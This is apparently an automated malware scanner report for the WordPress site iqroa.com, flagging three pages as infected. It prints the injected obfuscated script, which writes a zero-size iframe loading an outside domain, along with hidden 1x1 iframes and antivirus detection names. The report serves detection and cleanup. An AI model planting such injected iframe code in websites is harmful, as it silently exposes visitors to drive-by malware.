New scan:

Malware Scanner report for iqroa.com

Malicious/Suspicious/Total urls checked
3/0/17
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/6/6
6 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://iqroa.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 16 Jun 2015 09:45:09 GMT
Location: http://www.iqroa.com/
Server: Apache/2.2.29 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iqroa.com/xmlrpc.php
X-Powered-By: PHP/5.5.18
clean
http://www.iqroa.com/
200 OK
Content-Length: 23645
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<ifr" + "ame src='http" + ":http://googletraids.tk/466S' width='0" + "' height='0'></if" + "rame>");

Decoded script:


<iframe src='http:http://googletraids.tk/466S' width='0' height='0'></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

Hidden iFrame found.
size: 1x1     
src: http://googletraids.tk/463k

<iframe src="http://googletraids.tk/463k " width="1" height="1" frameborder="0">

Hidden iFrame found.
size: 1x1     
src: http://googletraids.tk/466s

<iframe src="http://googletraids.tk/466s " width="1" height="1" frameborder="0">

http://www.iqroa.com/wp-includes/js/jquery/jquery.js?ver=1.11.2
200 OK
Content-Length: 95952
Content-Type: application/javascript
clean
http://www.iqroa.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201525
200 OK
Content-Length: 9885
Content-Type: application/x-javascript
clean
http://s.gravatar.com/js/gprofiles.js?ver=2015Junaa
200 OK
Content-Length: 21442
Content-Type: application/x-javascript
clean
http://www.iqroa.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.2.2
200 OK
Content-Length: 959
Content-Type: application/javascript
clean
http://www.iqroa.com/wp-content/themes/iconic-one/js/selectnav.js?ver=1.0
200 OK
Content-Length: 4195
Content-Type: application/javascript
clean
http://stats.wp.com/e-201525.js
200 OK
Content-Length: 3334
Content-Type: application/x-javascript
clean
http://iqroa.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Tue, 16 Jun 2015 09:45:23 GMT
Pragma: no-cache
Location: http://www.iqroa.com/test404page.js
Server: Apache/2.2.29 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.iqroa.com/xmlrpc.php
X-Powered-By: PHP/5.5.18
clean
http://www.iqroa.com/test404page.js
404 Not Found
Content-Length: 14536
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<ifr" + "ame src='http" + ":http://googletraids.tk/466S' width='0" + "' height='0'></if" + "rame>");

Decoded script:


<iframe src='http:http://googletraids.tk/466S' width='0' height='0'></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

Hidden iFrame found.
size: 1x1     
src: http://googletraids.tk/463k

<iframe src="http://googletraids.tk/463k " width="1" height="1" frameborder="0">

Hidden iFrame found.
size: 1x1     
src: http://googletraids.tk/466s

<iframe src="http://googletraids.tk/466s " width="1" height="1" frameborder="0">

http://www.iqroa.com/feed/
200 OK
Content-Length: 10366
Content-Type: text/xml
clean
http://www.iqroa.com/2015/01/mulai-kapan-anak-sebaiknya-dikenalkan-gadget/
200 OK
Content-Length: 31371
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<ifr" + "ame src='http" + ":http://googletraids.tk/466S' width='0" + "' height='0'></if" + "rame>");

Decoded script:


<iframe src='http:http://googletraids.tk/466S' width='0' height='0'></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

Hidden iFrame found.
size: 1x1     
src: http://googletraids.tk/463k

<iframe src="http://googletraids.tk/463k " width="1" height="1" frameborder="0">

Hidden iFrame found.
size: 1x1     
src: http://googletraids.tk/466s

<iframe src="http://googletraids.tk/466s " width="1" height="1" frameborder="0">

https://apis.google.com/js/plusone.js
200 OK
Content-Length: 12914
Content-Type: application/javascript
clean
http://www.iqroa.com/wp-includes/js/comment-reply.min.js?ver=4.2.2
200 OK
Content-Length: 757
Content-Type: application/javascript
clean
http://www.iqroa.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.5
200 OK
Content-Length: 19615
Content-Type: application/javascript
clean
http://www.iqroa.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.5
200 OK
Content-Length: 8104
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: iqroa.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 16 Jun 2015 09:45:09 GMT
Location: http://www.iqroa.com/
Server: Apache/2.2.29 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iqroa.com/xmlrpc.php
X-Powered-By: PHP/5.5.18

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iqroa.com
Referer: http://www.google.com/search?q=iqroa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=iqroa.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iqroa.com/

Result: iqroa.com is not infected or malware details are not published yet.